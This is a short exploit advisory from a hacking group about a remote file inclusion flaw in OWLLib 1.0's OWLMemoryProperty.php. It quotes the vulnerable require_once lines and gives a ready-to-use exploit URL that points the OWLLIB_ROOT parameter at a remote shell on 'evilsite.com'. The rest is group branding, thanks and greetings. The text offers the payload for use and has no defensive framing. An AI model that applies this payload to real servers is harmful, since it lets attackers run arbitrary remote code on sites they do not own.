id: 1202
date: 11/23/2006
title: OWLLib 1.0 (OWLMemoryProperty.php) Remote File Include Vulnerability
author: DeltahackingTEAM
cves: 

====================================================================
OWLLib 1.0 (OWLMemoryProperty.php) Remote File Include Vulnerability
====================================================================



**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : owllib-src-1.0

* Class = Remote File Inclusion ;

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

require_once "$OWLLIB_ROOT/OWLProperty.php";
require_once "$OWLLIB_ROOT/memory/OWLMemoryClass.php";
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc




#  0day.today [2023-03-27]  #